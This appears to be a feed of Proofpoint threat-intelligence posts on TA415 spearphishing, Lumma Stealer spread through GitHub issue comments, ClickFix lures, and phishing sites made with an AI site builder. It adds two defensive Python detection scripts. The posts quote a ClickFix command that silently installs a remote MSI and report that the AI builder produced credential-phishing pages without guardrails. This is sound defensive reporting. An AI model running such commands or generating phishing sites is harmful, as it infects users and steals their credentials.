ThreatInsight
@threatinsight.proofpoint.com
290 followers 2 following 190 posts
Proofpoint's insights on targeted attacks and the cybersecurity threat landscape.
threatinsight.proofpoint.com
TA415’s pivot to target organizations and those tied to U.S.-China relations is noteworthy given today’s geopolitical landscape.

See our full blog for a detailed breakdown of these July and Aug 2025 campaigns, infection chain, IOCs, and ET rules.
threatinsight.proofpoint.com
Key finding 3️⃣: This marks a tactical shift away from earlier malware like the “Voldemort” backdoor, showing the group’s ability to adapt.

Key finding 4️⃣: A primary objective of these campaigns is likely the collection of intel on the trajectory of U.S.-China economic ties.
threatinsight.proofpoint.com
Key finding 2️⃣: Instead of traditional #malware, the campaigns deployed Visual Studio Code Remote Tunnels.

This is likely a concerted effort from #TA415 to blend in with existing legitimate traffic to trusted services, including Google Sheets/Calendar, & VS Code Remote Tunnels.
TA415 VS Code Remote Tunnel infection chain.
threatinsight.proofpoint.com
The group is impersonating trusted orgs and policymakers to target U.S. government, academic, and think tank targets.

Key finding 1️⃣: TA415 spoofed the U.S.-China Business Council and a senior congressional leader to deliver spearphishing lures tied to trade and sanctions policy.
TA415 phishing email spoofing US-China Business Council.
threatinsight.proofpoint.com
On September 2-3, some of the files attached to the issues had random file names and were encrypted. While they contained an executable with the same name, the threat actor did not provide the password for these files, so they could not be extracted or lead to any malware installation.
threatinsight.proofpoint.com
Although GitHub has removed some of the malicious comments, the links in the messages remained active as of September 3, including the actor-controlled URLs.
threatinsight.proofpoint.com
MD5: 4d8730a2f3388d018b7793f03fb79464
SHA1: cbc5b2181854a2672013422e02df9ea35c3c9e1c
SHA256: c8af1b27b718508574055b4271adc7246ddf4cec1c50b258d2c4179b19d0c839
threatinsight.proofpoint.com
&X-Amz-Date=20250903T111859Z&X-Amz-Expires=300&X-Amz-Signature=f0cd8226472614321e6b9e3b883bffe0adf9d9255af1207374947ea71d3c8f76&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3Bfilename%3Dfix.zip&response-content-type=application%2Fx-zip-compressed
threatinsight.proofpoint.com
Retrieved From: hxxps://objects[.]githubusercontent[.]com/github-production-repository-file-5c1aeb/195216627/22101425?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20250903%2Fus-east-1%2Fs3%2Faws4_request [...] [continued in next post]
threatinsight.proofpoint.com
The hash of the executable (and therefore the ZIP file) may vary depending on when the Lumma payload was built. Example:
File name: fix.zip
threatinsight.proofpoint.com
The downloaded file is always named “fix.zip”, which contains “x86_64-w64-ranlib.exe” and “msvcp140.dll”. If the executable is run, it launches #Lumma via “msbuild.exe”.
threatinsight.proofpoint.com
They claim to provide a fix for the reported problem. People who get these emails may include: the issue creator, the repository owner, the issue assignee, or any watchers.
threatinsight.proofpoint.com
The comment includes either a link to the actor-controlled domain droplink[.]digital, a Dropbox URL, or a file attached directly to the issue (which creates a link to the file hosted on GitHub).
threatinsight.proofpoint.com
Threat actors continue to abuse GitHub to deliver malware, this time: #LummaStealer. We identified GitHub notification emails that kick off the attack chain. Messages are sent when the threat actor, using an actor-controlled account, comments on existing GitHub issues. 🧵
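The notification-driven chain described in this thread can be triaged automatically at the mail gateway. The script below is an added example, not Proofpoint's code: it refangs a GitHub issue-comment notification, classifies the links it contains using the indicators from the thread (droplink[.]digital, Dropbox, GitHub-hosted attachments), looks for the lure file names, and checks a hash against the published ZIP hash. The sample e-mail is constructed, and the rule that a github.com link with /files/ in its path is an issue attachment is my own heuristic.

```python
"""Triage a GitHub issue-comment notification for the Lumma Stealer lure
described in the thread above.  Added example, not Proofpoint's code; the
e-mail text, the attachment-path heuristic and the output format are my own
assumptions, while the indicators come from the thread."""
import re
from urllib.parse import urlparse

# Indicators from the thread (defanged in the posts with hxxp / [.]).
ACTOR_DOMAINS = {"droplink.digital"}
FILE_HOSTS = {"dropbox.com", "www.dropbox.com", "objects.githubusercontent.com"}
LURE_FILENAMES = {"fix.zip", "x86_64-w64-ranlib.exe", "msvcp140.dll"}
KNOWN_SHA256 = {"c8af1b27b718508574055b4271adc7246ddf4cec1c50b258d2c4179b19d0c839"}

URL_RE = re.compile(r"https?://[^\s<>\"')\]]+", re.IGNORECASE)


def refang(text):
    """Turn hxxps://a[.]b back into https://a.b so URL parsing works."""
    return re.sub(r"hxxp", "http", text, flags=re.IGNORECASE).replace("[.]", ".")


def hostname(url):
    return (urlparse(url).hostname or "").lower()


def classify_url(url):
    """Return a label for URLs worth a second look, else None."""
    host = hostname(url)
    if host in ACTOR_DOMAINS or any(host.endswith("." + d) for d in ACTOR_DOMAINS):
        return "actor-controlled"
    if host in FILE_HOSTS:
        return "file-host"
    # Assumption: a github.com link whose path contains /files/ is an issue
    # attachment rather than the issue itself (the normal notification link).
    if host == "github.com" and "/files/" in urlparse(url).path:
        return "issue-attachment"
    return None


def triage_notification(body):
    """List (label, value) findings for one notification e-mail body."""
    findings = []
    text = refang(body)
    for url in URL_RE.findall(text):
        label = classify_url(url)
        if label:
            findings.append((label, url))
    lowered = text.lower()
    for name in sorted(LURE_FILENAMES):
        if name in lowered:
            findings.append(("lure-filename", name))
    return findings


def is_known_payload(sha256_hex):
    """Exact match against the ZIP hash from the thread; hashes vary per build."""
    return sha256_hex.lower() in KNOWN_SHA256


# Constructed sample notification (not a real message).
SAMPLE_EMAIL = """\
[example/repo] New comment on issue #42: build fails on Windows

@helpful-dev commented:
I had the same problem, here is the fix:
https://github.com/example/repo/files/12345/fix.zip
mirror: hxxps://droplink[.]digital/fix

View it on GitHub: https://github.com/example/repo/issues/42#issuecomment-1
"""

if __name__ == "__main__":
    for label, value in triage_notification(SAMPLE_EMAIL):
        print(f"{label:16} {value}")
```

Because the thread notes that the executable hash changes with each Lumma build, the hash check is only a confirmation step; the link classification and the fixed lure file names are the durable signals here.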
threatinsight.proofpoint.com
Threat actors are exploiting #Microsoft365 Direct Send to make their phishing campaigns appear to originate from inside an organization.

On this episode of DISCARDED, you'll hear why legacy features like Direct Send are a prime target for cybercriminals.

Stream now on our website: brnw.ch/21wVja5
threatinsight.proofpoint.com
Something #spicy is coming to the next Only Malware in the Building podcast—dropping September 2. 🌶️

Bookmark the show page and reserve your seat at the table 🪑 alongside Selena Larson, Dave Bittner and Keith Mularski.

🔥 You won't want to miss it! thecyberwire.com/podcasts/onl...

#podcast #hotones
threatinsight.proofpoint.com
With automatic web creation tools, threat actors can spend more time on multi-stage attack chains and more sophisticated tooling capabilities.

Developers of such tools should be mindful of opportunities for abuse and implement safeguards to prevent exploitation.

#socialengineering #impersonation
threatinsight.proofpoint.com
Our blog has further insights on how Lovable is being leveraged by threat actors.

This activity demonstrates how AI tools can significantly lower the barrier to entry for cybercriminals, especially those focused on creating social engineering content that appeals to the end user.
threatinsight.proofpoint.com
We've partnered with Lovable's Trust and Safety team to identify and take down hundreds of malicious domains.

The company says it's introducing security protections to proactively identify and block fraud activity and malicious users.

We thank them for their quick response and action.
threatinsight.proofpoint.com
When we replicated the malicious activity, we encountered no guardrails or errors in trying to create our fake phishing website.

The website we generated was equipped with capabilities that impersonated prominent enterprise software to steal credentials.
threatinsight.proofpoint.com
We have flagged tens of thousands of Lovable URLs as threats each month in email and SMS data since Feb 2025.

Threat actors create or clone websites that impersonate prominent brands, use CAPTCHA for filtering, and then post credentials to Telegram.
Example CAPTCHA that redirects to banking credential phishing website.
threatinsight.proofpoint.com
You asked, we answered. AI tools are significantly lowering the barrier to entry for cybercriminals.

We have observed threat actor campaigns leveraging the AI-generated website builder Lovable to create and host cred phishing, malware, and fraud websites.

Learn more in our blog: brnw.ch/21wV3Zo
Website redirect impersonating Aave built with Lovable.
threatinsight.proofpoint.com
Example system commands:

C:\Users\<username>\AppData\Local\Programs\MediaHuman Lyrics Finder Free\LdVBoxSVC.exe LdVBoxSVC.exe

Bitly redirect: hxxps://gitsecguards[.]com

ClickFix Landing domain: security[.]flaxergaurds[.]com
threatinsight.proofpoint.com
Organizations are encouraged to restrict PowerShell to only approved admin users.

Example ClickFix command: msiexec /i hxxps:///temopix[.]com /qn

Example of MSI: shields.msi | File Size: 10981376 Byte(s) (10.47 MB) | SHA256: 4c9df28e6b802ebe9e40f8fe34d2014b1fe524c64f7c8bd013f163c4daa794b2
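The ClickFix command quoted above installs an MSI straight from a URL with the UI suppressed, which is a pattern process-creation telemetry can catch regardless of the domain involved. The following is an added example, not Proofpoint's code: it refangs a command line, recognises msiexec, extracts a remote /i, /package or /a source (allowing the malformed "hxxps:///" form from the post), notes silent-install switches, and runs over constructed Sysmon-style events; the field names and heuristics are my own assumptions.

```python
"""Flag ClickFix-style msiexec invocations that install a package straight
from a URL, as in the command quoted above.  Added example, not Proofpoint's
code; the event records are constructed and the heuristics are my own."""
import re

# msiexec at the start of the command line or as a path component.
MSIEXEC_RE = re.compile(r'(?i)(?:^|[\\/\s"])msiexec(?:\.exe)?(?=[\s"]|$)')
# /i, /package or /a followed by an http(s) source; 2-3 slashes so the
# malformed "hxxps:///" form from the post still matches after refanging.
REMOTE_PKG_RE = re.compile(r'(?i)[/-](?:i|package|a)\s+"?(https?:/{2,3}[^\s"]+)')
# Silent-install switches that hide the installer UI from the user.
QUIET_RE = re.compile(r"(?i)(?:^|\s)[/-](?:q[nb]?|quiet)(?=\s|$)")


def refang(text):
    """Turn hxxps://a[.]b back into https://a.b before matching."""
    return re.sub(r"(?i)hxxp", "http", text).replace("[.]", ".")


def analyze_command(cmdline):
    """Describe one process command line; 'suspicious' = remote MSI source."""
    cmd = refang(cmdline)
    is_msi = bool(MSIEXEC_RE.search(cmd))
    m = REMOTE_PKG_RE.search(cmd) if is_msi else None
    remote = m.group(1) if m else None
    return {
        "is_msiexec": is_msi,
        "remote_source": remote,
        "quiet": is_msi and bool(QUIET_RE.search(cmd)),
        "suspicious": remote is not None,
    }


def scan_events(events):
    """Return (event, analysis) for each suspicious process-creation event."""
    hits = []
    for ev in events:
        result = analyze_command(ev["CommandLine"])
        if result["suspicious"]:
            hits.append((ev, result))
    return hits


# Constructed process-creation events (Sysmon-style field names assumed).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     # Command quoted in the post, defanged there as hxxps:///temopix[.]com
     "CommandLine": "msiexec /i hxxps:///temopix[.]com /qn"},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     # Ordinary software-deployment install from a local path: not flagged.
     "CommandLine": r'"C:\Windows\System32\msiexec.exe" /i C:\installs\agent.msi /qn'},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     # Uninstall by product code: no package source at all.
     "CommandLine": "msiexec.exe /x {12345678-0000-0000-0000-000000000000}"},
]

if __name__ == "__main__":
    for ev, res in scan_events(SAMPLE_EVENTS):
        print("SUSPICIOUS:", ev["CommandLine"], "->", res["remote_source"])
```

Quiet mode alone is not a signal, since managed deployments use /qn routinely; the remote URL source combined with an interactive parent such as explorer.exe (which the user-pasted ClickFix command produces) is what separates the two cases in the sample events.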